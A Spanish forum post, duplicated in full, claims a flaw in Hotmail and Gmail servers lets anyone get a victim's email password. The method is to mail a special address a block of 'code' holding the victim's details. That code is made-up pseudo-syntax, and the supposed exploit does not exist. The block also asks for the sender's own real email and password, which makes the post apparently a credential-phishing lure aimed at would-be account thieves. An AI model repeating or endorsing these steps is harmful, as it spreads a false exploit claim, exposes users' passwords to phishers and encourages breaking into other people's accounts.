Aquí tenéis la manera de conseguir la contraseña perdida de tu correo o robar
los correos a todos los estafadores que pululan por estos foros. Es relativamente
sencillo, hay un fallo en los servidores de hotmail que esta permitiendo el envío
de contraseñas tanto hotmail y gmail y lo único que necesitas saber de tu victima
es el nombre, apellido de esa persona y correo para que el sistema de hotmail ò
gmail te envíe la contraseña.
No es 100% efectiva y aveces demora máximo un día, pero a mi me ha funcionado
la mayoría de veces y mientras los servidores de estos correos no arreglen este
fallo podremos disfrutar de esta mina de oro.
Sigue estos pasos:
1- Paso. ! Averigua el nombre, apellido y correo de tu victima!
2- Paso. Cuando ya tengas ese dato, vete a tu correo de hotmail o gmail
(El habitual que utilizas, no sirve con nuevos) y dale click en "Nuevo mensaje" o "Redactar".
3- Paso. En “Para:” escribe esta dirección: [email protected]
En “Asunto:” Lost my password Y en el cuerpo del mensaje escribe el siguiente codigo:
:form_pwd; login=(escribe aqui el E-mail de tu victima):rst; =(su nombre) + (su apellido)
form.login.focus(); form.passwd.gets (); form_pwd; value="yes";
sendto=(escribe tu E-mail, no puede ir vacio y debe ser real);
form.passwd (escribe tu password del E-mail correspondiente, no puede ir vacio) form_pwd();
form.country (Escribe el pais donde te encuentras, no puede ir vacio ni inventar) form_con();
value="Admin";
4- Paso. Dale enviar (El correo de respuesta puede estar llegándote máximo en 1 día)
Aquí tenéis la manera de conseguir la contraseña perdida de tu correo o robar
los correos a todos los estafadores que pululan por estos foros. Es relativamente
sencillo, hay un fallo en los servidores de hotmail que esta permitiendo el envío
de contraseñas tanto hotmail y gmail y lo único que necesitas saber de tu victima
es el nombre, apellido de esa persona y correo para que el sistema de hotmail ò
gmail te envíe la contraseña.
No es 100% efectiva y aveces demora máximo un día, pero a mi me ha funcionado
la mayoría de veces y mientras los servidores de estos correos no arreglen este
fallo podremos disfrutar de esta mina de oro.
Sigue estos pasos:
1- Paso. ! Averigua el nombre, apellido y correo de tu victima!
2- Paso. Cuando ya tengas ese dato, vete a tu correo de hotmail o gmail
(El habitual que utilizas, no sirve con nuevos) y dale click en "Nuevo mensaje" o "Redactar".
3- Paso. En “Para:” escribe esta dirección: [email protected]
En “Asunto:” Lost my password Y en el cuerpo del mensaje escribe el siguiente codigo:
:form_pwd; login=(escribe aqui el E-mail de tu victima):rst; =(su nombre) + (su apellido)
form.login.focus(); form.passwd.gets (); form_pwd; value="yes";
sendto=(escribe tu E-mail, no puede ir vacio y debe ser real);
form.passwd (escribe tu password del E-mail correspondiente, no puede ir vacio) form_pwd();
form.country (Escribe el pais donde te encuentras, no puede ir vacio ni inventar) form_con();
value="Admin";
4- Paso. Dale enviar (El correo de respuesta puede estar llegándote máximo en 1 día)